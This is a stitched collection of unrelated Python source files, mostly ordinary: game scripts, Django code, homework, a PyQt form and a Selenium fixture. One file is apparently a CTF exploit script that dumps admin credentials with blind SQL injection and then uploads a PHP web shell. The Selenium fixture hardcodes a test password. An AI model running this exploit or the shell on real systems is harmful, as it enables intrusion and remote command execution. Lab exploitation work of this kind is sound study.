def init():
fieldID = sm.getFieldID()
oldFieldID = sm.getOldFieldID()
warp = True
if oldFieldID == 0:
map = 100000000
portal = 0
sm.chat("(Portal) Cannot find your previous map ID, warping to Henesys.")
elif oldFieldID == 910000000:
sm.chat("(Portal) Cannot find your previous map ID, warping to Henesys.")
map = 100000000
portal = 0
else:
#sm.chat("(Portal) This script (st00.py) is not coded for this map. (ID: " + str(fieldID) + ")")
map = oldFieldID
portal = 0
if warp:
sm.warp(map, portal)
sm.dispose() |
## HW5 - Implementing a Greedy Motif Finder
## Due 10am on Wed., 3/8/17
# Unfinished Portions:
# - Didn't get to the point generator, or most of the Greedy Algorithm, took an unreasonably long time fixing bugs on the frequency table.
## Nick Egan
# Time Estimate: 4
#Notes:
# #DB indicates lines used for debugging/info during runtime
#Citations:
# computeCounts, and computeFrequencies come from work during Lab6.
# Some of GreedyMotifSearch comes from HW4
import pylab
def main():
#motifString = getBindingSites("simulated-motifs.txt")
motifString = ["ACCCCGTCCCCC","ACCGTCCCCCCC","ACCCCGTCCCCT"] #DB test strings
bestMotif = []
for i in range(len(motifString)):
bestMotif.append(GreedyMotifSearch(motifString[i], 5, i)) #Creates an array of bestMotifs, while also keeping track of line number with i
print("HW5 has finished running. Have a nice day!")
return # ends main function
def getBindingSites(fileName):
#Input: filename, and file
#Output: text of file
myFile = open(fileName,'r') ## open the file
lineString = myFile.read() ## Read the file into one long string
myFile.close() ## close the file
lineString = lineString.strip() ## remove extra whitespace
lineList = lineString.split('\n') ## Split the string
print('\nMotifs:')
for pattern in lineList:
print(pattern)
return lineList
def GreedyMotifSearch(strand, k, lineCounter):
#Input: a single strand of DNA, length of motif
#Output: a string - the single motif with highest score
stringCutter = ""
bestMotifs = ""
motifList = []
frequencyList = []
countsArray = []
for i in range(len(strand)):
#Loop used to cut a bunch of k-mers
stringCutter = strand[i:i+k]
if len(stringCutter) < k: #Prevents short patterns
break
if i == 0:
bestMotifs = stringCutter #First k-mer is the first bestMotifs
motifList.append(stringCutter)
#print("The found motifs were: ", motifList) #DB
#print("For round ", i," the stringCutter is reading: ", stringCutter) #DB
# cut apart string, then count repetitions of every sequence
countsArray = computeCounts(motifList)
frequencyList.append(computeFrequencies(countsArray, lineCounter))
#motifPointGenerator(motifList, frequencyList)
return bestMotifs
def computeCounts(motifList):
#Input: a list of strings
#Output: counts of all the appearances of [A,C,G,T] in those strings, per index position.
aCounter = []
cCounter = []
gCounter = []
tCounter = []
finalCounter = []
for i in range(len(motifList[0])):
aCounter.append(0)
cCounter.append(0)
gCounter.append(0)
tCounter.append(0)
for i in range(len(motifList)):
stringCutter = motifList[i]
for n in range(len(stringCutter)):
characterSelector = stringCutter[n:n+1]
if characterSelector == "A":
aCounter[n] = aCounter[n] + 1
elif characterSelector == "C":
cCounter[n] = cCounter[n] + 1
elif characterSelector == "G":
gCounter[n] = gCounter[n] + 1
elif characterSelector == "T":
tCounter[n] = tCounter[n] + 1
print("\nA: ", aCounter) #DB
print("C: ", cCounter) #DB
print("G: ", gCounter) #DB
print("T: ", tCounter) #DB
finalCounter.append(aCounter)
finalCounter.append(cCounter)
finalCounter.append(gCounter)
finalCounter.append(tCounter)
#print("finalCounter: ", finalCounter) #DB
return finalCounter
def computeFrequencies(countListings, motifNumber):
#Input: counter array for the # of appearances of a letter in a string, and which line in order the motif is
#Process: sums up all the counters, and divides by position
#Output: determines the frequency of appearance of individual letters out of all letters in the counter array
positionSum = []
tempfreqHolder = []
freqHolder = []
tempSum = 0.0
for i in range(len(countListings[0])):
for n in range(len(countListings)):
# Loop calculates sum of nucleotide appearances in a position
tempSum = tempSum + countListings[n][i]
tempfreqHolder.append(countListings[n][i])
#print(tempSum) #DB
for n in range(len(countListings)):
# Loop turns counters into probabilities across nucleotides in one position
tempfreqHolder[n] = tempfreqHolder[n]/tempSum
freqHolder.append(tempfreqHolder)
tempfreqHolder = []
positionSum.append(tempSum)
tempSum = 0.0
#print(positionSum) #DB for making sure all characters are counted for each position
print("\nThe number of occurrences of nucleotide per position in motif line number ", motifNumber," are: ", freqHolder)
return freqHolder
def motifPointGenerator(motif, freq):
#Input: a string motif, and a frequency array per index position in the string
#Process: will produce a probability of that string occurring
#Output: a float that is this probability that assigns a value to that motif
profileHolder = []
'''
for i in range(len(freq)):
'''
return points
## The lines below will call the main() function
if __name__ == '__main__':
main() |
import csv
import django
django.setup()
import os
from sefaria.model import *
files = [f for f in os.listdir(".") if f.endswith(".csv")]
for f in files:
prev_ref = None
print(f)
with open(f, 'r') as open_f:
for row in csv.reader(open_f):
ref, comm = row
try:
ref = Ref(ref)
if prev_ref and ref.prev_segment_ref(prev_ref):
prev_ref = ref
elif prev_ref:
print("Problem at {}".format(ref))
break
except:
pass
|
class MyMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
if 'id' in request.session:
request.META['end-user'] = request.session.get('id')
else:
request.META['end-user'] = None
if 'Authorization' in request.session:
request.META['Authorization'] = request.session.get('Authorization')
else:
request.META['Authorization'] = None
response = self.get_response(request)
return response
|
from abc import abstractmethod
from typing import Dict, List
from src.dialog.common.manage_entity.ManageEntityDialogMode import ManageEntityDialogMode
from src.property.Property import Property
from src.property.PropertyValue import PropertyValue
from src.template.property.PropertyTemplate import PropertyTemplate
class ManageEntityFuncs:
@abstractmethod
def get_mode(self) -> ManageEntityDialogMode:
pass
@abstractmethod
def get_entity_key_property_id(self) -> str:
pass
def get_entity_props_templates(self) -> List[PropertyTemplate]:
pass
@abstractmethod
def get_entity_prop_value(self, prop_id: str) -> PropertyValue:
pass
@abstractmethod
def save_entity(self, key: str, props: Dict[str, Property]):
pass
@abstractmethod
def closed_on_x(self):
pass
|
from enum import Enum
class EncodingType(Enum):
ADJACENCY_ONE_HOT = "adjacency_one_hot"
ADJACENCY_MIX = 'adjacency_mix'
PATH = "path"
GCN = "gcn"
BONAS = "bonas"
SEMINAS = "seminas"
COMPACT = 'compact'
|
#!/usr/bin/env python
import cv2
import random
import os
# def check_empty(file):
# return os.stat(file).st_size == 0
# def isclose(a, b, rel_tol=.1, abs_tol=0.0):
# return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
# def crop_save_image(image, x_offset, y_offset, width, height):
# # image_path = "~/Documents/bigram_images/"
# Dir = '/home/vaibhav/Documents/bigram_images/'
# im = 'image_'
# crop = image[0:height, x_offset:width]
# file_name = Dir + im + str(int(random.random()*10000)) + ".png"
# cv2.imwrite(file_name, crop)
# if check_empty(file_name):
# print file_name + " X offset:" + str(x_offset) + "width:" +str(width)
# def sliding_window(image, bigram_size, unigram_size, height, width, word_size):
# X_MIN = 0
# X_MAX = width
# window = bigram_size
# k = 10
# delta = float(unigram_size/k)
# x_min = 0
# x_max = window
# i = float(0)
# print "Delta" + str(delta)
# # while x_max <= X_MAX:
# # change_position = x_min + usz
# # while i + x_min <= change_position and x_max + i <= X_MAX :
# # # print image, x_min + i, height, x_max + i, height
# # if x_max - x_min >= window:
# # crop_save_image(image, x_min + i, height, x_max + i, height)
# # i = i + delta
# # x_min = x_min + usz
# # x_max = x_max + usz
# # i = 0
# while x_max <= X_MAX:
# change_position = x_min + unigram_size
# if isclose(i, change_position):
# x_min = x_min + unigram_size
# x_max = x_max + unigram_size
# elif x_max + i <= X_MAX:
# crop_save_image(image, x_min + i, height, x_max + i, height)
# i = i + delta
# IMG_DIR =
# path = 'move.png'
# img = cv2.imread(path)
# word_size = 4
# height, width = img.shape[:2]
# xmin = 0
# xmax = width
# bsz=float(xmax-xmin)/(word_size*.5)
# usz=float(xmax-xmin)/(word_size)
# print "Bigram size:" + str(bsz) + " Unigram size:" + str(usz) + " Image size " + str(width)
# sliding_window(img,bsz,usz,height,width,word_size)
image = cv2.imread('/home/vaibhav/Documents/test_folder/Images/word1sample1.png')
height, width = image.shape[:2]
crop = image[0:height, width/2:width]
cv2.imwrite('crop_image_test_1.png', crop)
|
import json
class questions_store:
def __init__(self, file_name):
self.data_file = file_name
def load_questions(self):
self.items = []
try:
with open(self.data_file) as f:
data = json.loads(f.read())
self.items = data
return self.items
except Exception:
print("Couldn't read data from store")
class question_info:
'''
data structure to store information about questions in the DP matrix
'''
def __init__(self, question_id, is_selected, question_marks):
self.question_id = question_id
self.question_marks = question_marks
self.is_selected = is_selected
|
# print('让我看看你是啥', demo4.func())
from demo3 import demo7
# print(demo7)
# def func2():
# return "demo2进入执行"
|
# Generated by Django 2.2.6 on 2019-10-15 06:27
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('publications', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='ad',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='fecha de creación'),
preserve_default=False,
),
migrations.AddField(
model_name='ad',
name='updated',
field=models.DateTimeField(auto_now=True, verbose_name='fecha de edición'),
),
migrations.AddField(
model_name='trainer',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='fecha de creación'),
preserve_default=False,
),
migrations.AddField(
model_name='trainer',
name='updated',
field=models.DateTimeField(auto_now=True, verbose_name='fecha de edición'),
),
migrations.AlterField(
model_name='adoption',
name='size',
field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
),
migrations.AlterField(
model_name='cross',
name='size',
field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
),
migrations.AlterField(
model_name='finding',
name='size',
field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
),
migrations.AlterField(
model_name='straying',
name='size',
field=models.CharField(choices=[('CH', 'Chico'), ('CM', 'Chico/Mediano'), ('ME', 'Mediano'), ('GR', 'Grande')], max_length=2, verbose_name='tamaño'),
),
]
|
### Unintended solution ###
# @giovannichhatta
import hashlib, string, requests, sys, argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="IP address of the target.")
args = parser.parse_args()
if not args.target:
parser.print_help()
sys.exit(0)
PROXY = {
"http" : "http://127.0.0.1:8080"
}
TARGET = args.target
def sha1(string):
string = string
m = hashlib.sha1()
m.update(string.encode('utf-8'))
return m.hexdigest()
def Upload(username, password, filename, fileContent):
url = f"http://{TARGET}/admin/welcome.php"
cookies = Login(username, password, True)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------324239038032575636314150475280", "Origin": "http://192.168.206.189", "Connection": "close", "Referer": f"http://{TARGET}/admin/welcome.php", "Upgrade-Insecure-Requests": "1"}
data = f"-----------------------------324239038032575636314150475280\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\nContent-Type: text/plain\r\n\r\n{fileContent}\r\n-----------------------------324239038032575636314150475280\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload\r\n-----------------------------324239038032575636314150475280--\r\n"
requests.post(url, headers=headers, cookies=cookies, data=data)
def Login(username, password='test', admin=False):
password = password if admin else sha1(sha1(password) + "swag")
session = requests.session()
url = f"http://{TARGET}/login.php" if not admin else f"http://{TARGET}/admin/login.php"
data = {"form_password_hidden": password, "username": username, "password": '', "submit": "Submit","token" : "swag"}
session.post(url, data=data,proxies=PROXY)
cookies = session.cookies.get_dict()
if admin:
return cookies
else:
return CheckResponse(cookies)
def CheckResponse(cookies):
r = requests.get(f"http://{TARGET}/user_log.php", cookies=cookies, proxies=PROXY)
return len(r.content)
def Register(payload, password='test'):
password = sha1(password)
url = f"http://{TARGET}/register.php"
data = {"form_password_hidden": password, "username": payload, "password": '', "register": "Submit"}
requests.post(url, data=data)
return Login(payload)
def Bruteforce(payload):
FALSERESPONSE = Register("' or 1=2 -- -")
index = 1
falseInARow = 0
output = ""
for i in range(1000):
if falseInARow > 96:
break
for char in string.printable[:-6]:
if Register(payload.replace("[P]",char).replace("[C]", str(index))) != FALSERESPONSE:
falseInARow = 0
output += char
sys.stdout.write(char)
sys.stdout.flush()
index += 1
break
else:
falseInARow += 1
print()
return output
def UploadShell(username, password):
Upload(username, password, ".htaccess", "")
Upload(username, password, "shell.pHp", "<?php system($_GET[0]); ?>")
def Main():
print("Fetching Username: ", end='')
username = Bruteforce("' or (SELECT SUBSTRING(username,[C],1) from admin where id = 1) = '[P]' -- -")
print("Fetching password: ", end='')
password = Bruteforce("' or (SELECT SUBSTRING(password,[C],1) from admin where id = 1) = '[P]' -- -")
password = sha1(password + "swag")
print(f"Passing the hash with {password}")
UploadShell(username, password)
if __name__ == '__main__':
Main()
|
from django.urls import path
from .views import ToolListApiView,ToolDetailApiView, ToolTypesDetailApiView, ToolTypesListApiView, UserRecordView
app_name = 'api'
urlpatterns = [
path('', ToolListApiView.as_view(), name='tool_list'),
path('detail/<tool_code>', ToolDetailApiView.as_view(), name='tool_detail'),
path('type', ToolTypesListApiView.as_view(), name='type_list'),
path('type_detail/<type_id>', ToolTypesDetailApiView.as_view(), name='type_detail'),
path('user/', UserRecordView.as_view(), name='user' )
] |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import xmpp
def init(bot):
return 50
def description():
return 'set activity status(XEP-0108)'
#XEP-0108: User Mood
def help():
txt = 'Set activity status bot (XEP-0108) (v0.1)\n\n'
txt = txt+ 'Синтаксис: setactivity статус подстатус текст_статуса\n'
txt = txt+ 'Статусы: подстатусы\n'
txt = txt+ '- doing_chores: buying_groceries, cleaning, cooking, doing_maintenance ,doing_the_dishes ,doing_the_laundry, gardening, running_an_errand, walking_the_dog\n'
txt = txt+ '- drinking: having_a_beer, having_coffee, having_tea\n'
txt = txt+ '- eating: having_a_snack, having_breakfast, having_dinner, having_lunch\n'
txt = txt+ '- exercising: cycling, dancing, hiking, jogging, playing_sports, running, skiing, swimming, working_out\n'
txt = txt+ '- grooming: at_the_spa, brushing_teeth, getting_a_haircut, shaving, taking_a_bath, taking_a_shower\n'
txt = txt+ '- having_appointment\n'
txt = txt+ '- inactive: day_off, hanging_out, hiding, on_vacation, praying, scheduled_holiday, sleeping, thinking\n'
txt = txt+ '- relaxing: fishing, gaming, going_out, partying, reading, rehearsing, shopping, smoking, socializing, sunbathing, watching_tv, watching_a_movie\n'
txt = txt+ '- talking: in_real_life, on_the_phone, on_video_phone\n'
txt = txt+ '- traveling: commuting, cycling, driving, in_a_car, on_a_bus, on_a_plane, on_a_train, on_a_trip, walking\n'
txt = txt+ '- working: coding, in_a_meeting, studying, writing\n'
return txt
def run(bot,mess):
try:
text = mess.getBody()
command = text.split(' ')
activity=command[1]
subactivity=command[2]
text = text[len("setactivity")+1:]
l = len(activity)+1+len(subactivity)
text = unicode(text[l+1:])
item = xmpp.Node('activity', {'xmlns': xmpp.NS_ACTIVITY})
if activity:
i = item.addChild(activity)
i.addChild(subactivity)
if text:
i = item.addChild('text')
i.addData(text)
jid=''
query = xmpp.Iq('set', to=jid)
e = query.addChild('pubsub', namespace=xmpp.NS_PUBSUB)
p = e.addChild('publish', {'node': xmpp.NS_ACTIVITY})
p.addChild('item', {'id': '0'}, [item])
bot.send(query)
txt = 'Status activity set!'
return xmpp.Message(mess.getFrom(),txt)
except:
txt = help()
return xmpp.Message(mess.getFrom(),txt)
|
n = int(input())
for i in range(n):
n1 = int(input())
arr = [int(x) for x in input().split()]
arr2 = []
for j in range(n1-1):
if arr[j] > max(arr[j+1:]):
arr2.append(arr[j])
arr2.append(arr[n1-1])
print(*arr2)
|
import pytest
from selenium import webdriver
def pytest_addoption(parser):
parser.addoption("--userType", action="store", default="lo302")
parser.addoption("--browser", action="store", default="chrome")
@pytest.fixture(scope="class")
def setup(request):
browser = request.config.getoption("browser")
userType = request.config.getoption("userType")
if browser == "chrome":
chromeOptions = webdriver.ChromeOptions()
chromeOptions.add_argument("--start-maximized")
chromeOptions.add_argument("--disable-gpu")
driver = webdriver.Chrome(executable_path="E:\\python selenium\\chromedriver_win32\\chromedriver",
options=chromeOptions)
driver.get("https://genieuat.mykotaklife.com/genie-web/index.html#/login")
# driver.maximize_window()
driver.implicitly_wait(120)
driver.find_element_by_css_selector("button[id='dropdownMenu2']").click()
if userType == "apc" or "tied":
driver.find_element_by_css_selector("a[domain='Employee']").click()
if userType == "tied":
driver.find_element_by_css_selector("input[ng-model='username']").send_keys("lo302")
driver.find_element_by_css_selector("input[ng-model='password']").send_keys("Genie@1234")
driver.find_element_by_css_selector("button[ng-click='login()']").click()
if browser == "firefox":
firefoxOptions = webdriver.FirefoxOptions()
firefoxOptions.add_argument("--start-maximized")
firefoxOptions.add_argument("--disable-gpu")
driver = webdriver.Chrome(executable_path="E:\\python selenium\\geckodriver-v0.29.1-win64\\geckodriver",
options=firefoxOptions)
driver.get("https://genieuat.mykotaklife.com/genie-web/index.html#/login")
driver.maximize_window()
driver.implicitly_wait(30)
driver.find_element_by_css_selector("button[id='dropdownMenu2']").click()
if userType == "apc" or "tied":
driver.find_element_by_css_selector("a[domain='Employee']").click()
if userType == "tied":
driver.find_element_by_css_selector("input[ng-model='username']").send_keys("lo302")
driver.find_element_by_css_selector("input[ng-model='password']").send_keys("Genie@1234")
driver.find_element_by_css_selector("button[ng-click='login()']").click()
request.cls.driver = driver
yield
driver.close()
|
# 导入数据集iris
from sklearn.datasets import load_iris
import numpy as np
import matplotlib.pyplot as plt
# 导入决策树DTC包
from sklearn.tree import DecisionTreeClassifier
# 输出准确率 召回率 F值
from sklearn import metrics
# 载入数据集
iris = load_iris()
# 训练集
train_data = np.concatenate((iris.data[0:40, :], iris.data[50:90, :], iris.data[100:140, :]), axis=0)
# 训练集样本类别
train_target = np.concatenate((iris.target[0:40], iris.target[50:90], iris.target[100:140]), axis=0)
# 测试集
test_data = np.concatenate((iris.data[40:50, :], iris.data[90:100, :], iris.data[140:150, :]), axis=0)
# 测试集样本类别
test_target = np.concatenate((iris.target[40:50], iris.target[90:100], iris.target[140:150]), axis=0)
print("训练集", train_target)
# 训练
clf = DecisionTreeClassifier()
# 注意均使用训练数据集和样本类标
clf.fit(train_data, train_target)
print(clf)
# 预测结果
predict_target = clf.predict(test_data)
print(predict_target)
# 预测结果与真实结果比对
print(sum(predict_target == test_target),"==========================")
print(metrics.classification_report(test_target, predict_target))
print(metrics.confusion_matrix(test_target, predict_target))
# 获取花卉测试数据集两列数据集
X = test_data
L1 = [n[0] for n in X]
print(L1)
L2 = [n[1] for n in X]
print(L2)
# 绘图
# plt.scatter(L1, L2, c=predict_target, marker='x') # cmap=plt.cm.Paired
# plt.rcParams['font.sans-serif'] = ['SimHei']
# plt.title("决策树算法")
# plt.show()
|
from django.contrib import admin
from .models import Cart, Product, Reviews
# Register your models here.
admin.site.register(Cart)
admin.site.register(Reviews)
admin.site.register(Product) |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ClassificacaoRisco.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FichaAmbulatorialVerso(object):
def setupUi(self, FichaAmbulatorialVerso):
FichaAmbulatorialVerso.setObjectName("FichaAmbulatorialVerso")
FichaAmbulatorialVerso.resize(662, 997)
FichaAmbulatorialVerso.setStyleSheet("background-color: rgb(192, 255, 218);")
self.centralwidget = QtWidgets.QWidget(FichaAmbulatorialVerso)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 642, 977))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.widgetClassificacaoRisco = QtWidgets.QWidget(self.scrollAreaWidgetContents)
self.widgetClassificacaoRisco.setGeometry(QtCore.QRect(20, 350, 611, 551))
self.widgetClassificacaoRisco.setObjectName("widgetClassificacaoRisco")
self.radioVerde = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioVerde.setGeometry(QtCore.QRect(440, 230, 71, 21))
self.radioVerde.setStyleSheet("color: rgb(0, 255, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioVerde.setObjectName("radioVerde")
self.labelSaturacao = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelSaturacao.setGeometry(QtCore.QRect(0, 260, 71, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelSaturacao.setFont(font)
self.labelSaturacao.setObjectName("labelSaturacao")
self.labelNumeroFluxograma = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelNumeroFluxograma.setGeometry(QtCore.QRect(530, 160, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelNumeroFluxograma.setFont(font)
self.labelNumeroFluxograma.setObjectName("labelNumeroFluxograma")
self.lineEditCoordenador = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditCoordenador.setGeometry(QtCore.QRect(130, 490, 191, 20))
self.lineEditCoordenador.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCoordenador.setText("")
self.lineEditCoordenador.setObjectName("lineEditCoordenador")
self.lineEditFC = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditFC.setGeometry(QtCore.QRect(570, 260, 41, 20))
self.lineEditFC.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditFC.setText("")
self.lineEditFC.setObjectName("lineEditFC")
self.lineEditCoren = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditCoren.setGeometry(QtCore.QRect(380, 450, 51, 20))
self.lineEditCoren.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditCoren.setText("")
self.lineEditCoren.setObjectName("lineEditCoren")
self.line_3 = QtWidgets.QFrame(self.widgetClassificacaoRisco)
self.line_3.setGeometry(QtCore.QRect(-10, 520, 621, 20))
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.dateEditDataHoje = QtWidgets.QDateEdit(self.widgetClassificacaoRisco)
self.dateEditDataHoje.setGeometry(QtCore.QRect(370, 490, 81, 22))
self.dateEditDataHoje.setStyleSheet("background-color: rgb(242, 255, 250);")
self.dateEditDataHoje.setObjectName("dateEditDataHoje")
self.labelTemperatura = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelTemperatura.setGeometry(QtCore.QRect(230, 260, 41, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelTemperatura.setFont(font)
self.labelTemperatura.setObjectName("labelTemperatura")
self.radioAzul = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioAzul.setGeometry(QtCore.QRect(510, 230, 41, 21))
self.radioAzul.setStyleSheet("color: rgb(0, 255, 255);\n"
"background-color: rgb(0, 0, 0);")
self.radioAzul.setObjectName("radioAzul")
self.labelDestinoEncaminhamento = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelDestinoEncaminhamento.setGeometry(QtCore.QRect(10, 420, 191, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelDestinoEncaminhamento.setFont(font)
self.labelDestinoEncaminhamento.setObjectName("labelDestinoEncaminhamento")
self.labelCoordenador = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCoordenador.setGeometry(QtCore.QRect(10, 490, 111, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelCoordenador.setFont(font)
self.labelCoordenador.setObjectName("labelCoordenador")
self.lineEditTemperatura = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditTemperatura.setGeometry(QtCore.QRect(270, 260, 51, 20))
self.lineEditTemperatura.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditTemperatura.setText("")
self.lineEditTemperatura.setObjectName("lineEditTemperatura")
self.radioButtonDestinoPSF = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoPSF.setGeometry(QtCore.QRect(390, 420, 82, 17))
self.radioButtonDestinoPSF.setObjectName("radioButtonDestinoPSF")
self.labelDiscriminador = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelDiscriminador.setGeometry(QtCore.QRect(10, 200, 91, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelDiscriminador.setFont(font)
self.labelDiscriminador.setObjectName("labelDiscriminador")
self.labelClassificacaoRisco = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelClassificacaoRisco.setGeometry(QtCore.QRect(230, 0, 161, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelClassificacaoRisco.setFont(font)
self.labelClassificacaoRisco.setObjectName("labelClassificacaoRisco")
self.radioButtonDestinoConsultorio = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonDestinoConsultorio.setGeometry(QtCore.QRect(210, 420, 82, 17))
self.radioButtonDestinoConsultorio.setObjectName("radioButtonDestinoConsultorio")
self.lineEditNumeroFluxograma = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditNumeroFluxograma.setGeometry(QtCore.QRect(560, 160, 51, 20))
self.lineEditNumeroFluxograma.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditNumeroFluxograma.setText("")
self.lineEditNumeroFluxograma.setObjectName("lineEditNumeroFluxograma")
self.radioAmarela = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioAmarela.setGeometry(QtCore.QRect(520, 200, 71, 21))
self.radioAmarela.setStyleSheet("color: rgb(239, 239, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioAmarela.setObjectName("radioAmarela")
self.labelEnfermeiro = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelEnfermeiro.setGeometry(QtCore.QRect(10, 450, 101, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelEnfermeiro.setFont(font)
self.labelEnfermeiro.setObjectName("labelEnfermeiro")
self.lineEditFluxograma = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditFluxograma.setGeometry(QtCore.QRect(100, 160, 381, 20))
self.lineEditFluxograma.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditFluxograma.setText("")
self.lineEditFluxograma.setObjectName("lineEditFluxograma")
self.lineEditDiscriminador = QtWidgets.QLineEdit(self.widgetClassificacaoRisco)
self.lineEditDiscriminador.setGeometry(QtCore.QRect(100, 200, 241, 20))
self.lineEditDiscriminador.setStyleSheet("background-color: rgb(242, 255, 250);")
self.lineEditDiscriminador.setText("")
self.lineEditDiscriminador.setObjectName("lineEditDiscriminador")
self.labelFluxograma = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelFluxograma.setGeometry(QtCore.QRect(10, 160, 81, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelFluxograma.setFont(font)
self.labelFluxograma.setObjectName("labelFluxograma")
self.labelGlasgow = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGlasgow.setGeometry(QtCore.QRect(130, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGlasgow.setFont(font)
self.labelGlasgow.setObjectName("labelGlasgow")
self.labelFC = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelFC.setGeometry(QtCore.QRect(540, 260, 21, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelFC.setFont(font)
self.labelFC.setObjectName("labelFC")
self.radioLaranja = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioLaranja.setGeometry(QtCore.QRect(460, 200, 61, 21))
self.radioLaranja.setStyleSheet("color: rgb(255, 138, 55);\n"
"background-color: rgb(0, 0, 0);\n"
"")
self.radioLaranja.setObjectName("radioLaranja")
self.labelGlicemia = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelGlicemia.setGeometry(QtCore.QRect(330, 260, 61, 20))
font = QtGui.QFont()
font.setFamily("Calibri")
font.setPointSize(11)
font.setBold(False)
font.setWeight(50)
self.labelGlicemia.setFont(font)
self.labelGlicemia.setObjectName("labelGlicemia")
self.radioButtonVermelha = QtWidgets.QRadioButton(self.widgetClassificacaoRisco)
self.radioButtonVermelha.setGeometry(QtCore.QRect(390, 200, 71, 21))
self.radioButtonVermelha.setStyleSheet("color: rgb(255, 0, 0);\n"
"background-color: rgb(0, 0, 0);")
self.radioButtonVermelha.setObjectName("radioButtonVermelha")
self.labelCoren = QtWidgets.QLabel(self.widgetClassificacaoRisco)
self.labelCoren.setGeometry(QtCore.QRect(330, 450, 101, 20))
